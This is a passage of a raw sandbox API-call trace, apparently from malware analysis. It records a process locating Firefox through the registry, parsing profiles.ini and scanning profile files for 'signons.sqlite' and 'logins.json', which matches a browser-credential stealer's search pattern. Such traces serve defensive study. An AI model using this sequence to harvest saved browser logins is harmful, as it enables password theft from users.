phkResult=0x52e268*=0x0) returned 0x2 [0587.784] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5e6108 [0587.784] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", phkResult=0x52e2e8 | out: phkResult=0x52e2e8*=0x4d0) returned 0x0 [0587.785] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x0, lpName=0x5e6108, lpcchName=0x52e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="25.0 (en-US)", lpcchName=0x52e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0587.785] lstrlenW (lpString="\\") returned 1 [0587.785] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox") returned 32 [0587.785] LocalAlloc (uFlags=0x40, uBytes=0xc4) returned 0x58c838 [0587.785] lstrlenW (lpString="25.0 (en-US)") returned 12 [0587.785] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\") returned 33 [0587.785] LocalAlloc (uFlags=0x40, uBytes=0xdc) returned 0x2ed0060 [0587.785] LocalFree (hMem=0x58c838) returned 0x0 [0587.785] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", lpSrch="Firefox") returned="Firefox\\25.0 (en-US)" [0587.785] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e284 | out: phkResult=0x52e284*=0x664) returned 0x0 [0587.785] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e26c, lpData=0x0, lpcbData=0x52e280*=0x0 | out: lpType=0x52e26c*=0x0, lpData=0x0, lpcbData=0x52e280*=0x0) returned 0x2 [0587.785] RegCloseKey (hKey=0x664) returned 0x0 [0587.785] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e258 | out: phkResult=0x52e258*=0x664) returned 0x0 [0587.785] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e240, lpData=0x0, lpcbData=0x52e254*=0x0 | out: lpType=0x52e240*=0x0, lpData=0x0, lpcbData=0x52e254*=0x0) returned 0x2 [0587.785] RegCloseKey (hKey=0x664) returned 0x0 [0587.785] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e22c | out: phkResult=0x52e22c*=0x0) returned 0x2 [0587.785] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5eb208 [0587.785] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", phkResult=0x52e2ac | out: phkResult=0x52e2ac*=0x664) returned 0x0 [0587.785] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x5eb208, lpcchName=0x52e2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Main", lpcchName=0x52e2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0587.785] lstrlenW (lpString="\\") returned 1 [0587.785] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned 45 [0587.785] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0148 [0587.785] lstrlenW (lpString="Main") returned 4 [0587.785] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned 46 [0587.786] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2ab0 [0587.786] LocalFree (hMem=0x2ed0148) returned 0x0 [0587.786] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", lpSrch="Firefox") returned="Firefox\\25.0 (en-US)\\Main" [0587.786] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e248 | out: phkResult=0x52e248*=0x5ac) returned 0x0 [0587.786] RegQueryValueExW (in: hKey=0x5ac, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e230, lpData=0x0, lpcbData=0x52e244*=0x0 | out: lpType=0x52e230*=0x1, lpData=0x0, lpcbData=0x52e244*=0x66) returned 0x0 [0587.786] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed2060 [0587.786] RegQueryValueExW (in: hKey=0x5ac, lpValueName="PathToExe", lpReserved=0x0, lpType=0x0, lpData=0x2ed2060, lpcbData=0x52e244*=0x66 | out: lpType=0x0, lpData=0x2ed2060*=0x43, lpcbData=0x52e244*=0x66) returned 0x0 [0587.786] RegCloseKey (hKey=0x5ac) returned 0x0 [0587.786] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned 50 [0587.786] lstrlenW (lpString="") returned 0 [0587.786] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned 50 [0587.786] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2150 [0587.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpSrch=".exe") returned=".exe" [0587.786] StrRChrIW (lpStart="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpEnd=0x0, wMatch=0x5c) returned="\\firefox.exe" [0587.786] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox") returned 38 [0587.786] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x578b10 [0587.786] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x578b10 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0587.786] lstrlenW (lpString="\\Mozilla\\Firefox\\") returned 17 [0587.786] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0587.786] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2ba0 [0587.786] LocalFree (hMem=0x578b10) returned 0x0 [0587.786] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox")) returned 0x2010 [0587.788] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox" (normalized: "c:\\program files (x86)\\mozilla firefox")) returned 0x10 [0587.788] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0587.788] lstrlenW (lpString="") returned 0 [0587.788] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0587.788] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed3050 [0587.788] lstrlenW (lpString="profiles.ini") returned 12 [0587.788] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0587.788] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x5a1300 [0587.788] LocalAlloc (uFlags=0x40, uBytes=0xfe6a) returned 0x2ed9848 [0587.789] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5ec290 [0587.789] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0587.790] CloseHandle (hObject=0x5ac) returned 1 [0587.790] GetPrivateProfileSectionNamesW (in: lpszReturnBuffer=0x2ed9848, nSize=0xfde8, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpszReturnBuffer="General") returned 0x11 [0587.791] StrStrIW (lpFirst="General", lpSrch="Profile") returned 0x0 [0587.791] lstrlenW (lpString="General") returned 7 [0587.791] StrStrIW (lpFirst="Profile0", lpSrch="Profile") returned="Profile0" [0587.791] GetPrivateProfileStringW (in: lpAppName="Profile0", lpKeyName="Path", lpDefault="", lpReturnedString=0x5ec290, nSize=0xfff, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="Profiles/3y2joh8o.default") returned 0x19 [0587.792] GetPrivateProfileIntW (lpAppName="Profile0", lpKeyName="IsRelative", nDefault=1, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 0x1 [0587.792] lstrlenW (lpString="Profiles/3y2joh8o.default") returned 25 [0587.792] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0587.792] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x59a8a0 [0587.792] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0587.793] lstrlenW (lpString="\\*.*") returned 4 [0587.793] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0587.793] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x578b10 [0587.793] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*.*", lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 0x57d1e0 [0587.793] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0587.793] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0587.794] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0587.794] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0587.794] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0587.794] lstrlenW (lpString="\\") returned 1 [0587.795] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0587.795] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0587.795] lstrlenW (lpString="addons.json") returned 11 [0587.795] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0587.795] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5d7c90 [0587.795] LocalFree (hMem=0x578c38) returned 0x0 [0587.795] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.795] CloseHandle (hObject=0x4d8) returned 1 [0587.795] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0587.795] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5d7dc8 [0587.795] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x5d7dc8, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json") returned 0x58 [0587.795] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.795] CloseHandle (hObject=0x4d8) returned 1 [0587.795] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.795] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18 [0587.795] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0587.795] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0587.797] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57aeb0 [0587.797] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0587.797] CloseHandle (hObject=0x5b4) returned 1 [0587.797] CloseHandle (hObject=0x4d8) returned 1 [0587.797] LocalFree (hMem=0x5d7dc8) returned 0x0 [0587.797] StrStrIW (lpFirst="addons.json", lpSrch="signons.sqlite") returned 0x0 [0587.797] StrStrIW (lpFirst="addons.json", lpSrch="logins.json") returned 0x0 [0587.797] LocalFree (hMem=0x5d7c90) returned 0x0 [0587.797] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0587.797] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0587.797] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0587.797] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0587.797] lstrlenW (lpString="\\") returned 1 [0587.797] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0587.797] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0587.797] lstrlenW (lpString="bookmarkbackups") returned 15 [0587.797] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0587.797] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x5d7c90 [0587.797] LocalFree (hMem=0x578c38) returned 0x0 [0587.797] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0587.797] lstrlenW (lpString="\\*.*") returned 4 [0587.797] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0587.797] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56afc8 [0587.797] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\*.*", lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 0x57ca60 [0587.798] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0587.798] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 1 [0587.798] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0587.798] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0587.798] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 1 [0587.798] lstrlenW (lpString="\\") returned 1 [0587.798] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0587.798] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0587.798] lstrlenW (lpString="bookmarks-2017-06-30_5.json") returned 27 [0587.799] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0587.799] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x5d7dd0 [0587.799] LocalFree (hMem=0x56c300) returned 0x0 [0587.799] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b4 [0587.799] CloseHandle (hObject=0x5b4) returned 1 [0587.799] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0587.799] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x578c38 [0587.799] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x578c38, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") returned 0x78 [0587.799] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b4 [0587.799] CloseHandle (hObject=0x5b4) returned 1 [0587.799] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b4 [0587.799] GetFileSize (in: hFile=0x5b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0587.799] CreateFileMappingW (hFile=0x5b4, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4cc [0587.799] MapViewOfFile (hFileMappingObject=0x4cc, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0587.812] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57b060 [0587.812] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0587.812] CloseHandle (hObject=0x4cc) returned 1 [0587.812] CloseHandle (hObject=0x5b4) returned 1 [0587.812] LocalFree (hMem=0x578c38) returned 0x0 [0587.813] StrStrIW (lpFirst="bookmarks-2017-06-30_5.json", lpSrch="signons.sqlite") returned 0x0 [0587.813] StrStrIW (lpFirst="bookmarks-2017-06-30_5.json", lpSrch="logins.json") returned 0x0 [0587.813] LocalFree (hMem=0x5d7dd0) returned 0x0 [0587.813] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 1 [0587.813] lstrlenW (lpString="\\") returned 1 [0587.813] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0587.813] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0587.813] lstrlenW (lpString="bookmarks-2017-07-26_5.json") returned 27 [0587.813] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0587.813] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x5d7dd0 [0587.813] LocalFree (hMem=0x56c300) returned 0x0 [0587.813] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b4 [0587.813] CloseHandle (hObject=0x5b4) returned 1 [0587.813] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0587.813] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x578c38 [0587.813] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x578c38, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") returned 0x78 [0587.813] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b4 [0587.813] CloseHandle (hObject=0x5b4) returned 1 [0587.813] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b4 [0587.813] GetFileSize (in: hFile=0x5b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0587.813] CreateFileMappingW (hFile=0x5b4, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4cc [0587.813] MapViewOfFile (hFileMappingObject=0x4cc, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0587.819] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0587.820] CloseHandle (hObject=0x4cc) returned 1 [0587.820] CloseHandle (hObject=0x5b4) returned 1 [0587.820] LocalFree (hMem=0x578c38) returned 0x0 [0587.820] LocalFree (hMem=0x5d7dd0) returned 0x0 [0587.820] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 0 [0587.820] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0587.820] LocalFree (hMem=0x56afc8) returned 0x0 [0587.820] LocalFree (hMem=0x5d7c90) returned 0x0 [0587.820] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0587.820] lstrlenW (lpString="\\") returned 1 [0587.820] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0587.820] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0587.820] lstrlenW (lpString="cert8.db") returned 8 [0587.820] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0587.820] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x5d7c90 [0587.820] LocalFree (hMem=0x578c38) returned 0x0 [0587.820] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.821] CloseHandle (hObject=0x4d8) returned 1 [0587.821] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0587.821] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x5d7dc8 [0587.821] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x5d7dc8, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db") returned 0x55 [0587.821] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.821] CloseHandle (hObject=0x4d8) returned 1 [0587.821] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0587.821] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0587.821] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0587.821] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0587.822] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 